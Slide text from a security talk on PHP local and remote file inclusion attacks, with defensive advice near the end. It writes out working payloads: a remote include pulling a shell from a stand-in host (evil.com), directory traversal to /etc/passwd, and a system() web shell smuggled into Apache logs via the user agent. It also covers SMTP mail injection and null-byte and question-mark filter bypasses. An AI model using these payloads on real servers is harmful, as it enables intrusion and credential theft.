Tim Strijdhorst - Team THC - Inclusion Vulnerabilities 1 Speaker: Tim Strijdhorst Group: TeamTHC...
-
Upload
beverley-bryan -
Category
Documents
-
view
214 -
download
0
Transcript of Tim Strijdhorst - Team THC - Inclusion Vulnerabilities 1 Speaker: Tim Strijdhorst Group: TeamTHC...
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
1
Speaker: Tim StrijdhorstGroup: TeamTHC
File Inclusion Vulnerabilities
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
2
Disclaimer
The author of this talk is not responsbile for what you do with this information.
If you go out there and be a scriptkiddie, it's not only illegal it's also pretty lame.
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
3
Introduction
This talk handles:
PHP Apache Linux MySQL
It uses standard configuration (locations can differ from server to server)
All the theory can be applied to all sorts of software
So you are all but safe if you use windows with ASP and IIS
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
4
What is an inclusion vulnerability?
Based on userinput
As with SQL Injection, the developer is too trusting or too stupid.
Code often includes/imports other pages
Because of the size of the codefiles and proper design
Dynamic including is where it goes wrong
**YOU HAVE TO FILTER USER INPUT**
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
5
What is user input?
A lot of stuff, some you wouldn't expect: GET data (url variables) POST data Header data (user agent?) Cookies (just clientside textfiles) XMLHTTPRequests (ajax)
THE USER IS NOT TO BE TRUSTED
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
6
Definition of inclusion vulnerability
2 types of inclusion vulns:
Local File Inclusion (LFI) Remote File Inclusion (RFI)
Less common these days Needs >PHP 5.2 or a really retarded php.ini A lot of webhosts still use PHP 4 though
One of the easiest ways to lose your server
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
7
Example code
Index.php:<?phpinclude($_GET['page']);?>
test.html:<html><head><title>Example</title></head><body>This is an example of an included HTML page</body></html>
Developer intended use:http://localhost/index.php?page=test.html
Outputs the content of test.html
What's the vulnerability here?
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
8
Vulnerability explained
Lets say the php version is 4.3
Vulnerable for both remote and local inclusion
Lets say our input is:
http://localhost/index.php?page=http://www.google.com
Code would be:
<?php
Include(“http://www.google.com”);
?>
Which is completely valid PHP code (given the above circumstances)
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
9
Vulnerability explained
Lets say our input is:http://localhost/index.php?page=otherfile.txt
Code would be:<?phpinclude(“otherfile.txt”);?>
Still very valid PHP code that outputs the content of otherfile.txt
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
10
Why is this so awesome?
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
11
Basic exploitation of RFI
PHP shell (most popular out there is c99shell)
Lets say it's stored at http://evil.com/shell.txt (contains the code)
Lets say our input is:
http://localhost/index.php?page=http://evil.com/shell.txt
PHP will include the shell.txt and execute my code
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
12
The server is ours
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
13
Basic exploitation of LFI
Almost every PHP app has a config file
Most likely the almighty config.php This mostly includes the database credentials
Example:
<?php$CONFIG['database']['hostname'] = 'localhost';$CONFIG['database']['username'] = 'root';$CONFIG['database']['password'] = 'secret';$CONFIG['database']['database'] = 'lolwut';?>
Most applications: acces to database → administrator
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
14
Basic exploitation of LFI
This can also be used for:
Other functions (require,fopen,etc) Reading all non-php files (password files maybe?) Reading code
If it doesn't use include() but actually outputs the file highlight_file for example
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
15
Advanced LFI Tricks
Using directory traversal to read files
Injecting code into logs
Injecting code into session variables
Injecting code into environmental variables
Injecting code into other files
Injecting code into mail
Shared hosting
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
16
Basic UNIX background
Your current directory: /home/tim/
Name for current directory is '.'
Like: './lol.sh' to execute the lol.sh script inside /home/tim/
Name for parent directory is '..'
Like: '../lol.sh' to execute the lol.sh script inside /home/ But also: 'cat ../../etc/passwd' will work just fine
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
17
Using directory traversal
Website is located at: /var/www/public/index.php
It seems like we can only read stuff from /var/www/public/
Wrong, use the default unix parent-dir name '..'
For instance: http://localhost/index.php?page=../../../etc/passwd
root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/sh........
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
18
Injecting code into logs
Some information about apache access.log:
Example location: /var/log/apache2/access.log It logs all the get requests This includes used directory and user agent
A user agent is also user input since it's a spoofable header
The webserver can read it, if it's configured that way
99% of the time, this is the case Example (trimmed):
"GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Firefox/3.5.8”
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
19
Injecting code into logs
Use an user agent like:
<?system($_GET['c']);?> //arbitrary command execution Log entry looks like this:
"GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "<?system($_GET['c']);?>”
Example exploit:
http://localhost/index.php?page=../../log/apache2/access.log&c=cat /etc/passwd
Tadaa, another server is yours <(^_^<) <( ^_^ )> (>^_^)>
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
20
Injecting code into session variables
By default sessions are located in
/tmp/sess_%{phpsessionid} If you can inject information into a session variable
This will be saved in the sessionfile
You can find the sessionid in your cookies
Include this file and you will be able to inject code
<?phpstart_session();$_SESSION['lol'] = $_POST['userinput'];?>
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
21
Injecting code into environmental variables
Every process has process entry in /proc directory /proc/self references process directory of accessing
process /proc/self/environ holds environmental variables of the
process, in the case of apache, this includes the user agent, which we can inject code into
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
...
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=300
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
22
Injecting code into other files
Some websites offer image uploads (Avatars,photo gallery,etc) which aren't checked properly (file extension,mime type)
We can construct a valid .jpeg which contains php code in it's metadata
this will bypass any image validation check and get uploaded
hopefully to a predictable location
We can then include this file in our LFI attack to execute PHP code
There are many more ways to upload files
FTP, badly written uploadpages etc etc
Every single one of them can be a way in
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
23
Injecting code into mail
There are three ways to abuse email:
First of all we might send an e-mail to a user on the target server (Ie. [email protected]) and then attempt to include /var/spool/mail/tim. But this will only work on very badly configured out-of-date servers
The second method would be to include /var/log/maillog and then proceed to connect to port 25:
root@h4xb0x:/# telnet target.com 25
Connected to target.com.
220 hidden.domain.com ESMTP
HELO
250 hidden.domain.com
MAIL FROM: h4x0r < ?phpinfo();? >
250 ok
RCPT TO: [email protected]
250 ok
DATA
354 go ahead
Subject: pwnage.
250 ok 1186501618 qp 7063
quit
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
24
Injecting code into mail
The third method would be to send an e-mail to and existing user, assuming our target server runs a mail server, and attempt to include the mail-file
We would contain our PHP code in our e-mail and then proceed to include the file associated with our email
The standard qmail format (for example) is: /var/qmail/mailnames/[targetdomain.com]/[targetuser]/Maildir/new/
The filename format will be: <UNIX Timestamp>.<PID>.server.domain.com
We could then proceed to bruteforce the timestamp starting at an educated guess
We could attempt to determine the PID by information in /proc/self or we could bruteforce it
This attack is quite hard and not likely to succeed and should be considered a last resort as it's bound to make a lot of 'noise' on the server
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
25
Shared Hosting
Shared hosting
Multiple websites on 1 server (using VirtualHosts) Most cheap webhosting is shared hosting Free hosts is almost always shared hosting (and a good target)
Problem? If you are super secure, but your IP neighbour is sloppy you can have
a serious problem.
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
26
Shared Hosting
You want to hack alice.com
You can't it's super secure
You find bob.com which is on the same server
Bob has a inclusion vulnerability After pwning bob we can have more or less two situations:
The server rights are badly configured and we can access alice.com's files
The server's rights are properly configured but we can execute a privilege-escalation attack (local kernel exploit, for example)
alice.com is now yours too :)
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
27
Defending yourself
Filter user input
Example:
Wrong again (we'll see why shortly)
First strip away everything not alpha-numeric
Example: $page = preg_replace("/[^a-z0-9.]+/i", "", $page);
Who uses non-alpha-numeric chars in a filename anyway?
<?php$page = $_GET['page'].'.html'; //forces the .html filetypeinclude($page);?>
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
28
Defending yourself
Properly configure your box, this includes:
PHP (php.ini or safe_mode) Apache Operating System (access modes?) Proper rights management Apply basedir restrictions!
If you configure the server properly, damage can be controlled
even if someone manages to exploit you.
safe_mode will be gone in PHP6 though, so you better config it right
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
29
Defeating the defense
Does this really force the .html filetype?
Nope, there are 2 ways to circumvent it:
Nullbyte injection Questionmark injection
<?php$page = $_GET['page'].'.html'; //forces the .html filetypeinclude($page);?>
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
30
Nullbyte injection
Nullbyte, line-end character in C-strings
\0 or %00 in character encoded hex http://localhost/index.php?page=config.php%00
$page == 'config.php%00.html'
PHP parser doesn't care about nullbytes in strings
PHP parser itself is written is written in C and that's another story
This works for a lot of other things too
<?php$page = $_GET['page'].'.php'; //forces the .php filetypeinclude($page);?>
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
31
Questionmark Injection
This only works for remote inclusion
http://localhost/index.php?page=http://evil.com/shell.txt?
$page == 'http://evil.com/shell.txt?.php'
'?' is used for variabled (index.php?page=)
PHP thinks '.php' is variable
So it loads http://evil.com/shell.txt
<?php$page = $_GET['page'].'.php'; //forces the .php filetypeinclude($page);?>
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
32
The point to all this?
You can't trust your users
It could be your grandmother or a hacker, you just don't know.
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
33
References
http://en.wikipedia.org/wiki/Null_character#Security_exploit:_Poison_null_byte
http://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/
http://www.phpfreaks.com/tutorial/php-security
http://insecurity.nl/?strInsecurity_Component=article&intArticle_ID=2
http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
http://www.ush.it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/
Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
34
http://avatar-dev.tsl.utwente.nl
Questions?